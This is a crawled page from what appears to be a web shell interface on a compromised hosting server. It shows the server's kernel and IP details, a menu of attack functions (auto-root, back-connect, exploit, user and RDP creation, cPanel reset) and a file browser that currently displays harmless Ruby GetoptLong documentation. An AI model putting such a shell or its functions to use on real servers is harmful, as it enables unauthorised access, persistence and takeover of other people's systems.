Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
GetoptLong /
[ HOME SHELL ]
Name
Size
Permission
Action
AmbigousOption
[ DIR ]
drwxr-xr-x
Error
[ DIR ]
drwxr-xr-x
InvalidOption
[ DIR ]
drwxr-xr-x
MissingArgument
[ DIR ]
drwxr-xr-x
NeedlessArgument
[ DIR ]
drwxr-xr-x
cdesc-GetoptLong.yaml
3.77
KB
-rw-r--r--
each-i.yaml
694
B
-rw-r--r--
each_option-i.yaml
234
B
-rw-r--r--
error_message-i.yaml
321
B
-rw-r--r--
get-i.yaml
650
B
-rw-r--r--
get_option-i.yaml
231
B
-rw-r--r--
new-c.yaml
1.03
KB
-rw-r--r--
ordering%3d-i.yaml
2.5
KB
-rw-r--r--
set_error-i.yaml
254
B
-rw-r--r--
set_options-i.yaml
382
B
-rw-r--r--
terminate-i.yaml
252
B
-rw-r--r--
terminated%3f-i.yaml
283
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : each-i.yaml
--- !ruby/object:RI::MethodDescription aliases: - !ruby/object:RI::AliasName name: each_option block_params: option_name, option_argument comment: - !ruby/struct:SM::Flow::P body: Iterator version of `get'. - !ruby/struct:SM::Flow::P body: "The block is called repeatedly with two arguments: The first is the option name. The second is the argument which followed it (if any). Example: ('--opt', 'value')" - !ruby/struct:SM::Flow::P body: The option name is always converted to the first (preferred) name given in the original options to GetoptLong.new. full_name: GetoptLong#each is_singleton: false name: each params: () {|option_name, option_argument| ...} visibility: public
Close